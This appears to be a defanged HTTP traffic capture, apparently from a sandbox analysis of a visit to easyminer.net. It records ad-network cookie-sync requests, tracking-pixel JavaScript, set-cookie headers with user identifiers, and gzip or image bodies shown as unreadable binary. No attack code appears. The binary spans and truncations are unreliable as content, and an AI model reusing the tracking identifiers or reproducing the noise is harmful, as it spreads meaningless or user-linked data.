HTTP/1.1 200 OK..Content-Type: image/gif..Content-Length: 70..Date: Fr
i, 21 Jul 2017 15:05:42 GMT..GIF89a...................!..NETSCAPE2.0..
...!.......,................;....

GET /match?bid=2crn9e1&uid=b251d362-2acd-4970-85f4-3b4fcf2264c8 HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Cookie: mako_uid=15d65aed1dd-30270000010f1a0b

Connection: Keep-Alive

Host: ps.eyeota.net


HTTP/1.1 200 OK

Content-Type: image/gif

Content-Length: 70

Date: Fri, 21 Jul 2017 15:05:47 GMT

GIF89a...................!..NETSCAPE2.0.....!.......,................;
HTTP/1.1 200 OK..Content-Type: image/gif..Content-Length: 70..Date: Fr
i, 21 Jul 2017 15:05:47 GMT..GIF89a...................!..NETSCAPE2.0..
...!.......,................;....

GET /pixel?e_rc=2&pid=ml62m40&t=ajs&uid=2DE7B66B4518725926432CB1022296DF HTTP/1.1

Accept: application/javascript, */*;q=0.8

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ps.eyeota.net

Connection: Keep-Alive

Cookie: mako_uid=15d65aed1dd-30270000010f1a0b


HTTP/1.1 200 OK

Content-Type: application/javascript

Content-Length: 1146

Date: Fri, 21 Jul 2017 15:05:52 GMT
(new Image()).src = "http:\/\/sync.adap.tv\/eyeota_user_sync";(new Ima
ge()).src = "http:\/\/dpm.demdex.net\/ibs:dpid=30064&dpuuid=15d65aed1d
d-30270000010f1a0b&redir=http://ps.eyeota.net/match?bid=6j
5b2cv&uid=${DD_UUID}";(new Image()).src = "http:\/\/eyeota-s
ync.dotomi.com\/eyeota\/match?nuid=2OeEhSJbKAKnfeMSs5qpyd25iSorqopqzG8
-fwmhBzgQ&rurl=http://ps.eyeota.net/match?bid=r8d1b20";(ne
w Image()).src = "http:\/\/p.rfihub.com\/cm?pub=24472&in=1";(new Image
()).src = "http:\/\/pixel.tapad.com\/idsync\/ex\/receive?partner_id=23
76&partner_device_id=2y2HLmim-lDxCbqd_woBThAq2fJ2pZ410Tu8MtlixxQ8&part
ner_url=http://ps.eyeota.net/match?uid=${TA_DEVICE_ID%
7D&bid=6bnoi0v";function eyeota_callback(){var script=document.cre
ateElement("script");script.setAttribute("type","text\/javascript");sc
ript.setAttribute("async","");script.setAttribute("defer","");script.s
etAttribute("src","http:\/\/ps.eyeota.net\/pixel?e_rc=3&pid=ml62m40&t=
ajs&uid=2DE7B66B4518725926432CB1022296DF");var s = document.getElement
sByTagName('script')[0];s.parentNode.insertBefore(script, s);};setTime
out(eyeota_callback,5000);HTTP/1.1 200 OK..Content-Type: application/j
avascript..Content-Length: 1146..Date: Fri, 21 Jul 2017 15:05:52 GMT..
(new Image()).src = "http:\/\/sync.adap.tv\/eyeota_user_sync";(new Ima
ge()).src = "http:\/\/dpm.demdex.net\/ibs:dpid=30064&dpuuid=15d65aed1d
d-30270000010f1a0b&redir=http://ps.eyeota.net/match?bid=6j
5b2cv&uid=${DD_UUID}";(new Image()).src = "http:\/\/eyeo<<< skipped >>>

GET /match?uid=16918e61-6e26-11e7-8451-005056a24356&bid=6bnoi0v HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Connection: Keep-Alive

Host: ps.eyeota.net

Cookie: mako_uid=15d65aed1dd-30270000010f1a0b


HTTP/1.1 200 OK

Content-Type: image/gif

Content-Length: 70

Date: Fri, 21 Jul 2017 15:05:52 GMT

GIF89a...................!..NETSCAPE2.0.....!.......,................;
HTTP/1.1 200 OK..Content-Type: image/gif..Content-Length: 70..Date: Fr
i, 21 Jul 2017 15:05:52 GMT..GIF89a...................!..NETSCAPE2.0..
...!.......,................;....

GET /pixel?e_rc=3&pid=ml62m40&t=ajs&uid=2DE7B66B4518725926432CB1022296DF HTTP/1.1

Accept: application/javascript, */*;q=0.8

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ps.eyeota.net

Connection: Keep-Alive

Cookie: mako_uid=15d65aed1dd-30270000010f1a0b


HTTP/1.1 200 OK

Content-Type: application/javascript

Content-Length: 1146

Date: Fri, 21 Jul 2017 15:05:57 GMT
(new Image()).src = "http:\/\/cms.analytics.yahoo.com\/cms?partner_id=
Eyeot";(new Image()).src = "http:\/\/ads.avocet.io\/getuid?url=http:
//ps.eyeota.net/match?bid=b2c3gb0&uid={{UUID}}%0
A";(new Image()).src = "http:\/\/ml314.com\/utsync.ashx?eid=50052&et=0
&fp=2fTntY3H6YOSxIf_wdSMCfygOSDFrDPHL7c44QyB2zlI&return=http://p
s.eyeota.net/match?bid=r8hrb20&uid=nil";(new Image()).src = 
"http:\/\/match.rundsp.com\/match.gif?id=2Zs8eaBuCCVvYgNeWPi-feg-4rhBq
Xrmhi07KILu_SLQ&partner=eyeota&RED=http://ps.eyeota.net/match%
3Fbid=652b2cv&uid=";(new Image()).src = "http:\
/\/tags.bluekai.com\/site\/29539?limit=1&id=2Mo5g13cxp1RQR_Y0XPNVnAI1F
exng56KcfA9OuNEbrM";function eyeota_callback(){var script=document.cre
ateElement("script");script.setAttribute("type","text\/javascript");sc
ript.setAttribute("async","");script.setAttribute("defer","");script.s
etAttribute("src","http:\/\/ps.eyeota.net\/pixel?e_rc=4&pid=ml62m40&t=
ajs&uid=2DE7B66B4518725926432CB1022296DF");var s = document.getElement
sByTagName('script')[0];s.parentNode.insertBefore(script, s);};setTime
out(eyeota_callback,5000);HTTP/1.1 200 OK..Content-Type: application/j
avascript..Content-Length: 1146..Date: Fri, 21 Jul 2017 15:05:57 GMT..
(new Image()).src = "http:\/\/cms.analytics.yahoo.com\/cms?partner_id=
Eyeot";(new Image()).src = "http:\/\/ads.avocet.io\/getuid?url=http:
//ps.eyeota.net/match?bid=b2c3gb0&uid={{UUID}}%0
A";(new Image()).src = "http:\/\/ml314.com\/utsync.ashx?eid=50052&<<< skipped >>>

GET /match?bid=652b2cv&uid=fca3253dec2b4551ac13309d HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Cookie: mako_uid=15d65aed1dd-30270000010f1a0b

Connection: Keep-Alive

Host: ps.eyeota.net


HTTP/1.1 200 OK

Content-Type: image/gif

Content-Length: 70

Date: Fri, 21 Jul 2017 15:05:57 GMT

GIF89a...................!..NETSCAPE2.0.....!.......,................;
HTTP/1.1 200 OK..Content-Type: image/gif..Content-Length: 70..Date: Fr
i, 21 Jul 2017 15:05:57 GMT..GIF89a...................!..NETSCAPE2.0..
...!.......,................;....

GET /pixel?e_rc=4&pid=ml62m40&t=ajs&uid=2DE7B66B4518725926432CB1022296DF HTTP/1.1

Accept: application/javascript, */*;q=0.8

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ps.eyeota.net

Connection: Keep-Alive

Cookie: mako_uid=15d65aed1dd-30270000010f1a0b


HTTP/1.1 200 OK

Content-Type: application/javascript

Content-Length: 886

Date: Fri, 21 Jul 2017 15:06:02 GMT
(new Image()).src = "http:\/\/trc.taboola.com\/sg\/eyeota\/1\/cm";(new
 Image()).src = "http:\/\/rs.gwallet.com\/r1\/pixel\/x31662";(new Imag
e()).src = "http:\/\/aa.agkn.com\/adscores\/g.pixel?sid=9202273308&_pu
id=2FkFccuDUa0A4ZWrijR8aa74S-BqpAqQaRc13j1-G5-U&_redir=http://ps
.eyeota.net/match?bid=c9gd69u&uid=";(new Image()).src = "htt
p:\/\/eyeota2waycm.netmng.com\/cm\/?rd=http://ps.eyeota.net/ma
tch?bid=6bmpi0v&uid={UUID}";function eyeota_callback(){var
 script=document.createElement("script");script.setAttribute("type","t
ext\/javascript");script.setAttribute("async","");script.setAttribute(
"defer","");script.setAttribute("src","http:\/\/ps.eyeota.net\/pixel?e
_rc=5&pid=ml62m40&t=ajs&uid=2DE7B66B4518725926432CB1022296DF");var s =
 document.getElementsByTagName('script')[0];s.parentNode.insertBefore(
script, s);};setTimeout(eyeota_callback,5000);HTTP/1.1 200 OK..Content
-Type: application/javascript..Content-Length: 886..Date: Fri, 21 Jul 
2017 15:06:02 GMT..(new Image()).src = "http:\/\/trc.taboola.com\/sg\/
eyeota\/1\/cm";(new Image()).src = "http:\/\/rs.gwallet.com\/r1\/pixel
\/x31662";(new Image()).src = "http:\/\/aa.agkn.com\/adscores\/g.pixel
?sid=9202273308&_puid=2FkFccuDUa0A4ZWrijR8aa74S-BqpAqQaRc13j1-G5-U&_re
dir=http://ps.eyeota.net/match?bid=c9gd69u&uid=";(new 
Image()).src = "http:\/\/eyeota2waycm.netmng.com\/cm\/?rd=http:/%2
Fps.eyeota.net/match?bid=6bmpi0v&uid={UUID}";function ey
eota_callback(){var script=document.createElement("script");script<<< skipped >>>

GET /match?bid=c9gd69u&uid=164460302393000363526 HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Connection: Keep-Alive

Host: ps.eyeota.net

Cookie: mako_uid=15d65aed1dd-30270000010f1a0b


HTTP/1.1 200 OK

Content-Type: image/gif

Content-Length: 70

Date: Fri, 21 Jul 2017 15:06:02 GMT

GIF89a...................!..NETSCAPE2.0.....!.......,................;
HTTP/1.1 200 OK..Content-Type: image/gif..Content-Length: 70..Date: Fr
i, 21 Jul 2017 15:06:02 GMT..GIF89a...................!..NETSCAPE2.0..
...!.......,................;..

GET /css?family=Open Sans:400,400i,700,700i,800&subset=cyrillic HTTP/1.1

Accept: text/css

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: fonts.googleapis.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: text/css; charset=utf-8

Access-Control-Allow-Origin: *

Timing-Allow-Origin: *

Expires: Fri, 21 Jul 2017 15:05:40 GMT

Date: Fri, 21 Jul 2017 15:05:40 GMT

Cache-Control: private, max-age=86400

Content-Encoding: gzip

Transfer-Encoding: chunked

Server: ESF

X-XSS-Protection: 1; mode=block

X-Frame-Options: SAMEORIGIN
198...............n.@...}..C." Z(.x(.m-J[j.i.-..... ... M....4^.|..._v
[....B......U..J...9!..a.5?X.V..@H.........4P.....H.."H._;..x).1W9....
.CiL.>c.&.....%.2....B"..H...2..Xs.T.........1?n.......i...pEec.*.e
uI]...vs7 sE.U...R._.(..t(y.....H...P.......$...4".~...L..J.C..3k....H
..}....pW.....z?...s.g.x.d3i..>=... ........f....?...._V.Rc....<
..;.9.y......<.%..^=R._.............1K>]........e..qfgH.....2o4F
;=........a....B.M.......0..

GET /insync?vxii_pid=10005&vxii_pdid=2jTZLW4H_a54aWUznu9Vl2uyo57lJEyRlBY79U4BScZ0 HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: in.v12group.com

Connection: Keep-Alive


HTTP/1.1 302 Found

Date: Fri, 21 Jul 2017 15:05:47 GMT

Content-Length: 0

Connection: keep-alive

Server: Apache-Coyote/1.1

P3P: CP="NOI OUR BUS UNI COM NAV"

Set-Cookie: v12group=T2JqAQIWYXZyby5zY2hlbWHcA3sidHlwZSI6InJlY29yZCIsIm5hbWUiOiJjb29raWUiLCJuYW1lc3BhY2UiOiJ2MTIucGl4ZWwiLCJmaWVsZHMiOlt7Im5hbWUiOiJjb29raWVJZCIsInR5cGUiOiJzdHJpbmcifSx7Im5hbWUiOiJsYXN0U2VlbiIsInR5cGUiOiJsb25nIn0seyJuYW1lIjoidGltZXNTZWVuIiwidHlwZSI6ImludCJ9LHsibmFtZSI6InN1bUludGVydmFscyIsInR5cGUiOiJpbnQifSx7Im5hbWUiOiJzaXplIiwidHlwZSI6ImludCJ9XX0AOw/09Srs/B8hU8gYy pnRgJSSDZlMDRhYTZhLTc4YmQtNGRkYy1hN2VmLTNjNWU1N2QzNGZmYgAAAAA7D/T1Kuz8HyFTyBjL6mdG; Domain=v12group.com; Expires=Sat, 21-Jul-2018 15:05:47 GMT; Path=/

Location: hXXp://in.v12group.com/insync?vxii_pid=12&vxii_rcid=6e04aa6a-78bd-4ddc-a7ef-3c5e57d34ffb&vxii_pid1=10005&vxii_pdid=2jTZLW4H_a54aWUznu9Vl2uyo57lJEyRlBY79U4BScZ0

HTTP/1.1 302 Found..Date: Fri, 21 Jul 2017 15:05:47 GMT..Content-Lengt
h: 0..Connection: keep-alive..Server: Apache-Coyote/1.1..P3P: CP="NOI 
OUR BUS UNI COM NAV"..Set-Cookie: v12group=T2JqAQIWYXZyby5zY2hlbWHcA3s
idHlwZSI6InJlY29yZCIsIm5hbWUiOiJjb29raWUiLCJuYW1lc3BhY2UiOiJ2MTIucGl4Z
WwiLCJmaWVsZHMiOlt7Im5hbWUiOiJjb29raWVJZCIsInR5cGUiOiJzdHJpbmcifSx7Im5
hbWUiOiJsYXN0U2VlbiIsInR5cGUiOiJsb25nIn0seyJuYW1lIjoidGltZXNTZWVuIiwid
HlwZSI6ImludCJ9LHsibmFtZSI6InN1bUludGVydmFscyIsInR5cGUiOiJpbnQifSx7Im5
hbWUiOiJzaXplIiwidHlwZSI6ImludCJ9XX0AOw/09Srs/B8hU8gYy pnRgJSSDZlMDRhY
TZhLTc4YmQtNGRkYy1hN2VmLTNjNWU1N2QzNGZmYgAAAAA7D/T1Kuz8HyFTyBjL6mdG; D
omain=v12group.com; Expires=Sat, 21-Jul-2018 15:05:47 GMT; Path=/..Loc
ation: hXXp://in.v12group.com/insync?vxii_pid=12&vxii_rcid=6e04aa6a-78
bd-4ddc-a7ef-3c5e57d34ffb&vxii_pid1=10005&vxii_pdid=2jTZLW4H_a54aWUznu
9Vl2uyo57lJEyRlBY79U4BScZ0..

<<< skipped >>>

GET /r1/cm/p58 HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Cookie: ra1_uid=5797775682027760384; ra1_sid=263; RA1balancer=MTAuMTAzLjIuNzIgODg4OCB2Mg==

Connection: Keep-Alive

Host: rp.gwallet.com


HTTP/1.1 200 OK

Server: radiumone/1.4.2

Pragma: no-cache

P3p: CP="PSAo PSDo OUR BUS DSP NON COR"

Content-type: image/gif

Expires: Tue, 29 Oct 2002 19:50:44 GMT

Set-cookie: ra1_uid=5797775682027760384; Expires=Sat, 21-Jul-2018 15:06:02 GMT; Path=/; Domain=gwallet.com; Version=1

Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate

content-encoding: gzip

transfer-encoding: chunked

2f............r.t..Ldd`dh`....,. Z.D.d...\...........a....v.h. .....0.
.HTTP/1.1 200 OK..Server: radiumone/1.4.2..Pragma: no-cache..P3p: CP="
PSAo PSDo OUR BUS DSP NON COR"..Content-type: image/gif..Expires: Tue,
 29 Oct 2002 19:50:44 GMT..Set-cookie: ra1_uid=5797775682027760384; Ex
pires=Sat, 21-Jul-2018 15:06:02 GMT; Path=/; Domain=gwallet.com; Versi
on=1..Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-rev
alidate..content-encoding: gzip..transfer-encoding: chunked..2f.......
.....r.t..Ldd`dh`....,. Z.D.d...\...........a....v.h. .....0..

GET /adscores/g.pixel?sid=9202273308&_puid=2FkFccuDUa0A4ZWrijR8aa74S-BqpAqQaRc13j1-G5-U&_redir=http://ps.eyeota.net/match?bid=c9gd69u&uid= HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: aa.agkn.com

Connection: Keep-Alive


HTTP/1.1 302 Moved Temporarily

Date: Fri,  21 Jul 2017 15:06:02 GMT

Connection: close

Server: AAWebServer

P3P: policyref="hXXp://VVV.agkn.com/p3p/p3p.xml",CP="NOI NID"

Content-Length: 0

Location: hXXp://d.agkn.com/pixel/1716/?che=1500649562&sk=164460302393000363526&puid=2FkFccuDUa0A4ZWrijR8aa74S-BqpAqQaRc13j1-G5-U&as2=&l1=http://ps.eyeota.net/match?bid=c9gd69u&uid=164460302393000363526

Set-Cookie: ab=0001:LD85hcPaWklOZuyfQeIJ0oPc1QYcfqFm; Domain=.agkn.com; Expires=Fri,  21 Jul 2018 15:06:02 GMT; Path=/

GET /eyeota/match?dtm_test=27c7cceb86980571&nuid=2OeEhSJbKAKnfeMSs5qpyd25iSorqopqzG8-fwmhBzgQ&rurl=http://ps.eyeota.net/match?bid=r8d1b20 HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: eyeota-sync.dotomi.com

Connection: Keep-Alive

Cookie: dtm_test=27c7cceb86980571


HTTP/1.1 302 Found

Server: nginx

Date: Fri, 21 Jul 2017 15:05:52 GMT

Content-Length: 0

Connection: close

Set-Cookie: DotomiUser=178803986803010036$3$791191598$$1; Expires=Sat, 18 Aug 2018 15:05:52 GMT; Path=/; Domain=.dotomi.com

Cache-Control: max-age=0, no-store

P3P: policyref="/w3c/p3p.xml", CP="NOI DSP NID OUR STP"

Location: hXXp://ps.eyeota.net/match?bid=r8d1b20

GET /pixel/1716/?che=1500649562&sk=164460302393000363526&puid=2FkFccuDUa0A4ZWrijR8aa74S-BqpAqQaRc13j1-G5-U&as2=&l1=http://ps.eyeota.net/match?bid=c9gd69u&uid=164460302393000363526 HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Cookie: ab=0001:LD85hcPaWklOZuyfQeIJ0oPc1QYcfqFm

Connection: Keep-Alive

Host: d.agkn.com


HTTP/1.1 302 Found

Cache-Control: no-cache, must-revalidate

Date: Fri, 21 Jul 2017 15:06:02 GMT

Expires: Sat, 01 Jan 2000 00:00:00 GMT

Location: hXXp://ps.eyeota.net/match?bid=c9gd69u&uid=164460302393000363526

P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"

Pragma: no-cache

Server: Apache-Coyote/1.1

Set-Cookie: ab=0001:LD85hcPaWklOZuyfQeIJ0oPc1QYcfqFm;Max-Age=31536000;domain=agkn.com;path=/

Set-Cookie: u=C|0CAAAAAAAIQTU2gAAAAAAAgEWAAAAAAbtAAAAAA;Max-Age=31536000;domain=agkn.com;path=/

Content-Length: 0

Connection: keep-alive
HTTP/1.1 302 Found..Cache-Control: no-cache, must-revalidate..Date: Fr
i, 21 Jul 2017 15:06:02 GMT..Expires: Sat, 01 Jan 2000 00:00:00 GMT..L
ocation: hXXp://ps.eyeota.net/match?bid=c9gd69u&uid=164460302393000363
526..P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV 
INT"..Pragma: no-cache..Server: Apache-Coyote/1.1..Set-Cookie: ab=0001
:LD85hcPaWklOZuyfQeIJ0oPc1QYcfqFm;Max-Age=31536000;domain=agkn.com;p
ath=/..Set-Cookie: u=C|0CAAAAAAAIQTU2gAAAAAAAgEWAAAAAAbtAAAAAA;Max-Age
=31536000;domain=agkn.com;path=/..Content-Length: 0..Connection: keep-
alive..

GET /getuid?http://ps.eyeota.net/match?uid=$UID&bid=2cr76e1 HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ib.adnxs.com

Connection: Keep-Alive


HTTP/1.1 302 Found

Server: nginx/1.11.5

Date: Fri, 21 Jul 2017 15:05:44 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 0

Connection: keep-alive

Cache-Control: no-store, no-cache, private

Pragma: no-cache

Expires: Sat, 15 Nov 2008 16:00:00 GMT

P3P: policyref="hXXp://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"

X-XSS-Protection: 0

Location: hXXp://ib.adnxs.com/bounce?/getuid?http%3A%2F%2Fps.eyeota.net%2Fmatch%3Fuid%3D%24UID%26bid%3D2cr76e1

AN-X-Request-Uuid: a7edc77a-a93e-456d-a89f-c2171dd582fa

Set-Cookie: sess=1; Path=/; Max-Age=86400; Expires=Sat, 22-Jul-2017 15:05:44 GMT; Domain=.adnxs.com; HttpOnly

Set-Cookie: uuid2=6436859416475074122; Path=/; Max-Age=7776000; Expires=Thu, 19-Oct-2017 15:05:44 GMT; Domain=.adnxs.com; HttpOnly

X-Proxy-Origin: 194.242.96.218; 194.242.96.218; 308.bm-nginx-loadbalancer.mgmt.ams1; *.adnxs.com; 185.33.222.199:80
HTTP/1.1 302 Found..Server: nginx/1.11.5..Date: Fri, 21 Jul 2017 15:05
:44 GMT..Content-Type: text/html; charset=utf-8..Content-Length: 0..Co
nnection: keep-alive..Cache-Control: no-store, no-cache, private..Prag
ma: no-cache..Expires: Sat, 15 Nov 2008 16:00:00 GMT..P3P: policyref="
hXXp://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSD
o OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"..X-XSS-Protection: 0..L
ocation: hXXp://ib.adnxs.com/bounce?/getuid?http%3A%2F%2Fps.
eyeota.net%2Fmatch%3Fuid%3D%24UID%26bid%3D2cr76e1..AN-X-Re
quest-Uuid: a7edc77a-a93e-456d-a89f-c2171dd582fa..Set-Cookie: sess=1; 
Path=/; Max-Age=86400; Expires=Sat, 22-Jul-2017 15:05:44 GMT; Domain=.
adnxs.com; HttpOnly..Set-Cookie: uuid2=6436859416475074122; Path=/; Ma
x-Age=7776000; Expires=Thu, 19-Oct-2017 15:05:44 GMT; Domain=.adnxs.co
m; HttpOnly..X-Proxy-Origin: 194.242.96.218; 194.242.96.218; 308.bm-ng
inx-loadbalancer.mgmt.ams1; *.adnxs.com; 185.33.222.199:80..<<< skipped >>>

GET /modules/eu_cookie/templates/front/css/divascookies.css?fm=1488863722 HTTP/1.1

Accept: text/css

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: easyminer.net

Connection: Keep-Alive

Cookie: INTELLI_90833303d1=9dd599517f1317a5a76366f195a0443d


HTTP/1.1 200 OK

Cache-Control: public, max-age=31536000,public, must-revalidate, proxy-revalidate

Expires: Sat, 21 Jul 2018 15:05:39 GMT

Last-Modified: Tue, 07 Mar 2017 05:15:22 GMT

Content-Type: text/css

Content-Length: 485

Content-Encoding: gzip

Vary: Accept-Encoding

Date: Fri, 21 Jul 2017 15:05:39 GMT

Accept-Ranges: bytes

Server: LiteSpeed

Pragma: public

X-Powered-By: W3 Total Cache/0.9.3

Connection: Keep-Alive
...............0.......7..u.H.NBH...B.x.YO..t..xw...8...].......rY....
QG..| ...G......r.....o..9C....1.;.-b.%>.>..*.k.5c.1nu.....i.)..
.c..!......|`..$g...be.....g...). .....X.dS[..,...R..>W..../...S...
oW.....fM.4.2...<..k.N':..^.<^n.O2.?I.e.}.C.-Y.NB.OI....m.%.wT..
"....;Q.Z..M....^T.H..y.4F..Bn|Pwl.o.....J.>. ...(1z.....]I....lh).
..FZ:....E6.?o.6;. ..X4......`!k.. _...27.......PG.2.Zy....6.}Ru...9..
n]/.zT...^q.R.....>...y.ii.n..l.....z...9..*hK}.`*....$C.K...n...94
...Xv..o....@.......


GET /templates/kickstart/img//mountains.jpg HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: easyminer.net

Connection: Keep-Alive

Cookie: INTELLI_90833303d1=9dd599517f1317a5a76366f195a0443d


HTTP/1.1 200 OK

Cache-Control: public, max-age=31536000,public, must-revalidate, proxy-revalidate

Expires: Sat, 21 Jul 2018 15:05:39 GMT

Last-Modified: Thu, 20 Apr 2017 19:11:32 GMT

Content-Type: image/jpeg

Content-Length: 4934

Date: Fri, 21 Jul 2017 15:05:39 GMT

Accept-Ranges: bytes

Server: LiteSpeed

Pragma: public

X-Powered-By: W3 Total Cache/0.9.3

Connection: Keep-Alive
.PNG........IHDR..............q}.....PLTE.r.....k..p..f..n..h..q..j..e
....................|...R........m....x.........z.....................
...........Q..a..D....^...t.....Z..=.....-....O...A..h.....S.L......K.
.8..F..|.U.....PIDATx..].s....e=l&6.....f....x7s.&........o.y..T.TM...
.#..[-............................................~?.Z.5....<..n.g.
?w*......~..*h... ....H..ktk..w.}0.....l..&=..A.{....... .`=.v6.o....q
w.|...L.....I..q.E.....6[.t.J..0..............j<..t...pv.i..J.g).u.
..O.].AC..v....O.....0".....<..[c..e...^....=.hy03..7..*H..*....[..
..l.....ojCd........<........T.AXgcK..?.. DP...G......"....u.3....o
....s..w......T..v.Q...ayk.l.........wX7.......L`kD..w,........M]CC.3.
.G t.>...[..n./......:...d..6.8....q...:F.`hM.......i0.[..........W
Dr.a.......O ...F.v.....6....jl./.....<..%Y....J,y..) '#Kr.....r...
...\..... ...p_.z.S...#..)......)[....&......J......F^.f....f....0.-..
.w...C%R..59%.:....[M0.....t..0.l..?.. ..9I....@.....M..n.9'}........0
*M.u.4...l7a.*.EW.]...:..0.ffX.Q....'!6...5.......u.FvL...q..r|.q|..]T
..0..|tj...$.-...&...~........{...7.._.5..4..7.....i......=rW.k...(.6x
..(O?.}G...l...0lt..[a.<=us.W....Cm).'......*........o.CCNz....]KP.
;u....:..z0c..-..j.^W....0...F.."... .m-.......a~T..p2~.\s._m.aJG.q|Vl
.N...O.......V9...S.tPb.|.^.g_f92N.:....9.......'FJ0\...0.`.0`IRD]x.*.
42.>.........cj.;........?AL....Z..#d.A..@.$3....D...l.BM..o]Q.....
6".Y............C[.m..=%.........WH. Xn.G.1G....-. 6..v..0.42n[`....a.
...........F..b.X_.vqc...z?...v......U.....=K.c.T`......3p7.X.:_.K<<< skipped >>>

GET /js/intelli/intelli.js?fm=1491181282 HTTP/1.1

Accept: application/javascript, */*;q=0.8

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: easyminer.net

Connection: Keep-Alive

Cookie: INTELLI_90833303d1=9dd599517f1317a5a76366f195a0443d


HTTP/1.1 200 OK

Cache-Control: public, max-age=31536000,public, must-revalidate, proxy-revalidate

Expires: Sat, 21 Jul 2018 15:05:39 GMT

Last-Modified: Mon, 03 Apr 2017 01:01:22 GMT

Content-Type: application/x-javascript

Content-Length: 7879

Content-Encoding: gzip

Vary: Accept-Encoding

Date: Fri, 21 Jul 2017 15:05:39 GMT

Accept-Ranges: bytes

Server: LiteSpeed

Pragma: public

X-Powered-By: W3 Total Cache/0.9.3

Connection: Keep-Alive
...........\kw.F..._.....EAR2.. [.X..x.'^..M.....H..........{ou7. .J..
..>..~TW......,.8M.u..|.....P..C.S0.U6Q.,V.*..E...46.....6<R..PJ
......}v./^.7....(Mm.,.G.... i...Ngqx......U....(..,T......|)..e..s..)
 o... 35....G....y....f..<.W.B}9..4......n.....d...$[(.#..j`(H*b.^y
..A=.t|....S..}......a.... r..........i9......]..8h6J.9.0ik..fRe......
.|..7.n5.Xn.O..0.,..,.H.~->l[.....[.g!b.9...^5&F.t..Z....Q.P....r..
s.i..z....=.['....g..f......o.......,\....../.iRz.G.A.C.......0.%...&@
N.j....B?.....;.....@.....q!"......i.3..$.~.....'.....DCW..n`.u.v..c.8
.U..3.r..k.s.f.q.......Tv....I#]...M..%..4.oU.....|.......s..K .."....
9.2(g.l9mka....j...d...C.{..\...8.^&9....&.d5.^.E.P."...H.3..Z..M."..'
